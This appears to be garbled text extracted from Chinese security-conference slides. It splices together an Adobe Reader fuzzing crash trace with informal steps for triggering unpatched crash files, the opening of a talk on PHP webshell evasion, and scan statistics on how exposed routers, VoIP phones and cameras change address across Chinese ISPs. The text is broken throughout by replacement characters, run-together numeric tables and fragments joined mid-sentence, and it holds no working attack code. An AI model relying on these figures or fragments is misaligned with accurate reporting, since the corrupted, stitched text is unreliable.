160、00!PDAlt�����ernatesGetCosObj+0 x2ae38002cf0b0 586d6f92 00000000 bb8df8df 215661b8 AcroRd32_57de0000!ixVectorNextHit+0 x6a9cb002cf0f8 5850ba83 00000000 00000000 002cf158 AcroRd32_57de0000!AIDE:PixelPartInfo:operator=+0 x27c742002cf108 55af0c8a 215661b8 c0010000 00000005 AcroRd32_57de0000!AIDE:PixelPartIn
161、fo:operator=+0 xb1233002cf158 57e6ee62 347faff0 bb8df9bb�������� 3b00cff0 ACROFORM!DllUnregisterServer+0 x3a7e1002cf19c 57e6e7b7 0000041d bb8dfa2b 0000041d AcroRd32_57de0000!DllCanUnloadNow+0 x1dce6Patched Sample 2 32位Windows 7环境中以1280 x800为分辨率最大化启动Adobe Reader并均匀点击七下确定可触发.pdf以及稍微麻烦点的因为这个还没补(深呼吸)打开文件后等待右下角“
162、store and share files”字样出来后点击第一个对话框然后取消保存文件选项并确认字体缺失对话框后等待十秒点击JS对话框后触发.pdf还有锻炼肺活量的 Fuzzing还在缓慢的继续中,大约每10秒一个样本 佛系漏洞挖掘者大概每周看一次结果 漏洞提交也是随缘,想起来就提交三五个 估计目前����没有其他人找到类似的漏洞 我们获得了在KCON得瑟的素材 冯小刚-功夫.jpg应该达成目标了此处应有掌声完了PHPCHIP.COM PHP动态特性的捕捉与逃逸Phith0n2019目录CONTENTSPART 01PHP与动态特性01PART 02如何检测PHP动态特性02PART 03从攻击者的角
163、度突破限制03PHP与动态特性常见PHP Webshell的类型我们来做一个“代码哲学家”PART ����01PHP与动态特性PHP与Web应用PHP是世界上最好的语言PHP是Web应用最广泛的语言灵活发展迅速逐渐废弃不安全的特性其灵活的特性往往成为Webshell、漏洞的导火索常见PHP Webshell的类型 直接型:对比间�����隔时间扫描结束18,87815,35518,53414,10529,92033,44730,26334,68826,96024,55727,79326,0760
324、5,00010,00015,00020,00025,00030,00035,00040,000间隔6天间隔34天间隔49天间隔74天暴露资产(个)对比时间无变化消失资����产新出现资产两次对比类型没有发生变化的数量相对于基准消失的资产数量相对于基准新增的资产数量路 由 器 变 化 情 况80端口路由器 平均扫描周期3天 总量约5万u 变化的资产数量相对稳定,约有3.3万路由器网络地址发生过变化,约占总量的68%40,02135,19534,16228,370141,984146,810151,282153,635156,634167,817167,917184,164050,000100,00015
325、0,000200,000间隔16天间隔28天间隔40天间隔64天暴露资产(个)对比时间无变化消失资产新出现资产VoIP电 话 变 化 情 况5060端口VoIP电话 平均扫描周期3天 总量约18万u 变化的资产数量相对稳定,约有15万VoIP电话网络地址发生过变化,大约占总资产量的80%摄 像 头 变 化 情 况356,042327,989308,393303,499123,192151,245170,841175,7351�������27,975156,589177,893185,131050,000100,000150,000200,000250,000300,000350,000400,000间隔3
326、天间隔6天间隔12天间隔15天暴露资产(个)对比时间无变化消失资产新出现资产554端口摄像头 平均扫描周期3天 总量约47万u 约有15万摄像头网络地址发生过变化������,占总资产量的25%68%Router80%VoIP25%��������Camera观察发现:互联网上的暴露物联网资产网络地址,根据类型的不同均存在着不同程度的变化,并且新增和消失的数量几乎平衡,变化量随着时间的推移缓慢递增摄 像 头 变 化 情 况(平均扫描周期增加到7天)263,346255,615253,186243,053179,506187,237189,665199,801183,815194,817198,747207,148050,
327、000100,000150,000200,000250,000300,000间隔23天间隔33天间隔38天间隔56天暴露资产(个)对比时间无变化消失资产新出现资产554端口摄像头 扫描周期增加到7天u 增加平均扫描周期,相比之前间隔3天,资产的变化量45%,相比之前3天扫描周期增加20%;但有24万资产,间隔56天未发生变化观察发现:在�������一定范围内,缩短国内资产平均扫描周期,可以减少资产变化数量;同样有一部分物联网资产地址在观测时间内一直都没有变化33,20032,30431,27530,6453,9125,0895,9156,3934,1255,0216,0506,680010,00020,0
328、0030,00040,000间隔3天间隔6天间隔9天间隔11天暴露资产(个)无变化消失资产新出现资产18,45019,86319,54719,1521,9751,3312,6183,4091,9142,7382,3443,78505,00010,00015,00020,00025,000间隔3天间隔6天间隔9天间隔10天暴露资产(个)无变化消失资产新出现资产日 本 5 5 4 端 口 摄 像 �����头 变 化 情 况新 加 坡 5 5 4 端 口 摄 像 头 变 化 情 况亚 太 地 区 物 联 网 资 产 变 化 并 不 明 显对比于国内,日本和新加坡的资产变化比例明显小的多������,仅有不到15%的资产
329、在变化资 产 网 络 地 址 变 化 原 因 分 析PART 03关 于 资 产 变 化 的 猜 想猜想1:物联网资产的网络地址变更,导致我们看到的资产变化猜想2:网络地址变化可能在一定范围内,并且有可能和运营商相关分 布 在 同 C 段 映 射 的 物 联 网 资 产 统 计0-20,5,560,194,59%20-50,2,025,966,21%50-100,1,465,491,15%100以上,453,381,5%累计2个月物联网设备IP分布在������同������网段的数量统计发现:同一网段物联网资产数量大于20的资产数量占总量的41%资 产 C 段 映 射 变 化 明 显 下 降4
330、7459048725456344732547806490780200004000060000800000140000间隔23天间隔33天间隔38天间隔56天暴露资产(个)无变化消失网段新增网段554端口的摄像头302829499573834300422444763684020004000600080004000间隔26天间隔34天间隔49天间隔58天暴露资产(个)不变网段消失网段新增网段80端口的路由器47,18247,58647,794�������39,80110,0231
331、0,85611,37117,14512,03112,05212,1268,331010,00020,00030,00040,00050,000间隔16天间隔28天间隔40天间隔49天暴露资产(个)无变化消失网段新增网段5060端口VoIP电话35%网段发�����生变化30%网段发生变化25%网段发生变化40%70%80%35%30%25%0.60%1.04%4.09%������0%20%40%60%80%摄像头路由器VoIP电话网络地址C段映射B段映射物 联 网 资 产 地 址 变 化 与 网 段 变 化 对 比发现:物联网资产网络地址在一定网段内变化结论:运营商采用的动态分配地址的策略导致物联网资产网络地址变
332、化网 络 地 址 变 化 资 产 的 运 营������ 商 分 布 情 况7.78%8.94%11.61%12.00%41.03%48.02%63.09%87847042005000000025�������00030000350000.00%10.00%20.00%30.00%40.00%50.00%60.00%70.00%中国移动通信公司中国联通China169骨干网中国电信骨干网中华电信(台湾)中国电信集团中国电信广域网核心自治系统北京电信通网络科技有限公司IP运营商名称变化占比变化数量10.88%11.07%24.50%31.30%53.11%
333、55.22%60.84%70.80%73773352094000000.00%20.00%40.00%60.00%80.00%中国移动通信公司中华电信(台湾)电讯盈科有限公司中国电信集团中国电信骨干网中国联通China169骨干网中国联通北京市网络中国联通IP网络广东省China169变化占比变化数量554端口摄像头变化资产ASN分布情况80端口路由器变化资产ASN分布情况IPv6 物 联 网 资 产 网 络 地 址 变 化 情 况PART 04IPv6 网 络 地 址 探 测 的 困 难 性IPv6地址数量是IPv4的2�������96倍,IPv6可以地球上每一粒沙分配一个IP,而且还有剩余目前IPv6地址使用的实际数量较少,并且地址分布的随机性较大通过对全网扫描发现IPv���6资产,从时间和资源上都不切实际利 用
sgpjbg002
工作日 8:30 - 17:30
报告分类
